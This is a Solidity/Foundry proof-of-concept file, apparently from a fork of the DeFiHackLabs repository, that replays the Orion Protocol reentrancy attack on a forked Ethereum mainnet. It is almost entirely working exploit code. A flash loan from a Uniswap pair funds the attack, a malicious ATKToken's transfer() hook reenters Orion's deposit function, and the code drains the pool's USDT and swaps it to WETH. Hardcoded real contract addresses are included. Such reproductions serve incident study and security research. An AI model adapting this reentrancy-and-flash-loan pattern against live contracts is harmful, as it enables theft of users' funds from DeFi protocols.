forked from zhouxianyuan/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 2
/
Orion_exp.sol
177 lines (154 loc) · 7.02 KB
/
Orion_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.17;
import "forge-std/Test.sol";
import "./interface.sol";
// @Analsysi
// https://twitter.com/peckshield/status/1621337925228306433
// https://twitter.com/BlockSecTeam/status/1621263393054420992
// https://www.numencyber.com/analysis-of-orionprotocol-reentrancy-attack-with-poc/
// @TX
// https://etherscan.io/tx/0xa6f63fcb6bec8818864d96a5b1bb19e8bd85ee37b2cc916412e720988440b2aa ETH
// https://bscscan.com/tx/0xfb153c572e304093023b4f9694ef39135b6ed5b2515453173e81ec02df2e2104 BSC
// similar events
// https://github.com/SunWeb3Sec/DeFiHackLabs#20221223---defrost---reentrancy
// https://github.com/SunWeb3Sec/DeFiHackLabs#20221110---dfxfinance---reentrancy
interface OrionPoolV2Factory {
function createPair(address tokenA, address tokenB) external;
function getPair(address tokenA, address tokenB) external view returns(address);
}
interface ORION {
function swapThroughOrionPool(
uint112 amount_spend,
uint112 amount_receive,
address[] calldata path,
bool is_exact_spend
) external;
function depositAsset(address assetAddress, uint112 amount) external;
function getBalance(address assetAddress, address user) external view returns (int192);
function withdraw(address assetAddress, uint112 amount) external;
}
contract ContractTest is Test {
IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
ORION Orion = ORION(0xb5599f568D3f3e6113B286d010d2BCa40A7745AA);
OrionPoolV2Factory Factory = OrionPoolV2Factory(0x5FA0060FcfEa35B31F7A5f6025F0fF399b98Edf1);
Uni_Router_V2 Router = Uni_Router_V2(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
Uni_Router_V3 RouterV3 = Uni_Router_V3(0xE592427A0AEce92De3Edee1F18E0157C05861564);
Uni_Pair_V2 Pair = Uni_Pair_V2(0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852);
uint256 flashAmount;
IERC20 ATK;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet", 16_542_147);
vm.label(address(USDT), "USDT");
vm.label(address(USDC), "USDC");
vm.label(address(Orion), "ORION");
vm.label(address(Factory), "Factory");
vm.label(address(ATK), "ATK");
vm.label(address(RouterV3), "RouterV3");
vm.label(address(Pair), "Pair");
}
function testExploit() public {
deal(address(USDT), address(this), 1e6); // set the USDT balance of exploiter is 1
deal(address(USDC), address(this), 1e6); // set the USDC balance of exploiter is 1
ATK = new ATKToken(address(this));
addLiquidity();
address(USDT).call(abi.encodeWithSignature("approve(address,uint256)", address(Orion), type(uint256).max));
USDC.approve(address(Orion), type(uint256).max);
Orion.depositAsset(address(USDC), 500_000);
flashAmount = USDT.balanceOf(address(Orion));
Pair.swap(0, flashAmount, address(this), new bytes(1));
USDTToWETH();
emit log_named_decimal_uint(
"Attacker WETH balance after exploit", WETH.balanceOf(address(this)), WETH.decimals()
);
}
function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
address[] memory path = new address[](3);
path[0] = address(USDC);
path[1] = address(ATK);
path[2] = address(USDT);
Orion.swapThroughOrionPool(10_000, 0, path, true);
Orion.withdraw(address(USDT), uint112(USDT.balanceOf(address(Orion)) - 1));
address(USDT).call(abi.encodeWithSignature("transfer(address,uint256)", address(Pair), flashAmount * 1000 / 997 + 1000));
}
function addLiquidity() internal {
Factory.createPair(address(ATK), address(USDT));
address Pair1 = Factory.getPair(address(ATK), address(USDT));
Factory.createPair(address(ATK), address(USDC));
address Pair2 = Factory.getPair(address(ATK), address(USDC));
address(USDT).call(abi.encodeWithSignature("transfer(address,uint256)", address(Pair1), 5 * 1e5));
ATK.transfer(address(Pair1), 50 * 1e18);
USDC.transfer(address(Pair2), 5 * 1e5);
ATK.transfer(address(Pair2), 50 * 1e18);
Uni_Pair_V2(Pair1).mint(address(this));
Uni_Pair_V2(Pair2).mint(address(this));
}
function deposit() external {
Orion.depositAsset(address(USDT), uint112(USDT.balanceOf(address(this))));
}
function USDTToWETH() internal {
address(USDT).call(abi.encodeWithSignature("approve(address,uint256)", address(RouterV3), type(uint256).max));
Uni_Router_V3.ExactInputSingleParams memory _Params = Uni_Router_V3.ExactInputSingleParams({
tokenIn: address(USDT),
tokenOut: address(WETH),
fee: 3000,
recipient: address(this),
deadline: block.timestamp,
amountIn: USDT.balanceOf(address(this)),
amountOutMinimum: 0,
sqrtPriceLimitX96: 0
});
RouterV3.exactInputSingle(_Params);
}
}
contract ATKToken is IERC20 {
uint256 public totalSupply;
mapping(address => uint256) public balanceOf;
mapping(address => mapping(address => uint256)) public allowance;
string public name = "ATKToken";
string public symbol = "ATK";
uint8 public decimals = 18;
address public exp;
IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
ORION Orion = ORION(0xb5599f568D3f3e6113B286d010d2BCa40A7745AA);
constructor(address exploiter) {
mint(100 * 1e18);
exp = exploiter;
}
function transfer(address recipient, uint256 amount) external returns (bool) {
balanceOf[msg.sender] -= amount;
balanceOf[recipient] += amount;
if (USDT.balanceOf(exp) > 1e6) {
exp.call(abi.encodeWithSignature("deposit()"));
}
emit Transfer(msg.sender, recipient, amount);
return true;
}
function approve(address spender, uint256 amount) external returns (bool) {
allowance[msg.sender][spender] = amount;
emit Approval(msg.sender, spender, amount);
return true;
}
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool) {
allowance[sender][msg.sender] -= amount;
balanceOf[sender] -= amount;
balanceOf[recipient] += amount;
emit Transfer(sender, recipient, amount);
return true;
}
function mint(uint256 amount) public {
balanceOf[msg.sender] += amount;
totalSupply += amount;
emit Transfer(address(0), msg.sender, amount);
}
function burn(uint256 amount) external {
balanceOf[msg.sender] -= amount;
totalSupply -= amount;
emit Transfer(msg.sender, address(0), amount);
}
function withdraw(uint256 wad) external{}
function deposit(uint256 wad) external returns (bool){}
function owner() external view returns (address){}
}